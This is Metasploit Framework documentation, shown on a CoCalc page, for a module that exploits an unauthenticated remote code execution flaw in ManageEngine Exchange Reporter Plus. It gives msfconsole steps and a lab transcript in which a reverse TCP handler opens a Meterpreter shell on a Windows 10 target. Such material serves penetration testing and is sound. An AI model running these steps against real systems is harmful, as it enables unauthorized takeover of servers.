CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/http/manageengine_adshacluster_rce.md
Views: 1904

Description

This module exploits a remote code execution vulnerability that exists in Exchange Reporter Plus <= 5310, caused by execution of bcp.exe file inside ADSHACluster servlet. Additional information can be viewed on https://security.szurek.pl/en/manage-engine-exchange-reporter-plus-unauthenticated-rce/

Verification Steps

Exchange Reporter Plus 5216

Verification Steps

  1. Install the application

  2. Start msfconsole

  3. Do: use exploit/windows/http/manageengine_adshacluster_rce

  4. Do: set rhost <ip>

  5. Do: check

[*] Version: 5216
[+] 192.168.88.125:8181 The target is vulnerable.

  1. Do: set lport <port>

  2. Do: set lhost <ip>

  3. Do: exploit

  4. You should get a shell.

Scenarios

Exchange Reporter Plus 5216 on Windows Target

msf > use exploit/windows/http/manageengine_adshacluster_rce
msf exploit(windows/http/manageengine_adshacluster_rce) > set rhost 192.168.88.125
rhost => 192.168.88.125
msf exploit(windows/http/manageengine_adshacluster_rce) > check

[*] Version: 5216
[+] 192.168.88.125:8181 The target is vulnerable.
msf exploit(windows/http/manageengine_adshacluster_rce) > set lport 1111
lport => 1111
msf exploit(windows/http/manageengine_adshacluster_rce) > set lhost 192.168.88.120
lhost => 192.168.88.120
msf exploit(windows/http/manageengine_adshacluster_rce) > exploit

[*] Started reverse TCP handler on 192.168.88.120:1111
[*] Sending stage (179779 bytes) to 192.168.88.125
[*] Meterpreter session 2 opened (192.168.88.120:1111 -> 192.168.88.125:49955) at 2018-07-02 18:58:01 +0200

meterpreter > sysinfo
Computer        : WIN10
OS              : Windows 10 (Build 16299).
Architecture    : x64
System Language : pl_PL
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows